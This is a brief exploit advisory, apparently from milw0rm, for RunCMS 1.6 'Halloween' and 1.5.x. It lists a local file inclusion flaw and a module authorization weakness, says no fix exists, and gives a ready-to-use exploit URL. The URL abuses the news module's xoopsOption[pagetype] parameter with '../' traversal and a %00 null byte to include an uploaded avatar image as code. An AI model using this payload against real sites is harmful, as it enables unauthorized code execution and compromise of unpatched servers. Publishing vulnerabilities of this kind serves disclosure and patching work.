Vendor: ]]>http://www.runcms.org/]]>
Bugs: Local File Inclusion, Modules Authorization Weakness
Vulnerable Version: RunCMS 1.6 Halloween, 1.5.x (prior versions also may be affected)
Exploitation: Remote with browser
Exploit: Available
Fix Available: No!
exp:
http://site.com/runcms_1.6/modules/news/?xoopsOption[pagetype]=../../images/avatar/users/[uid].gif%00
©milw0rm.com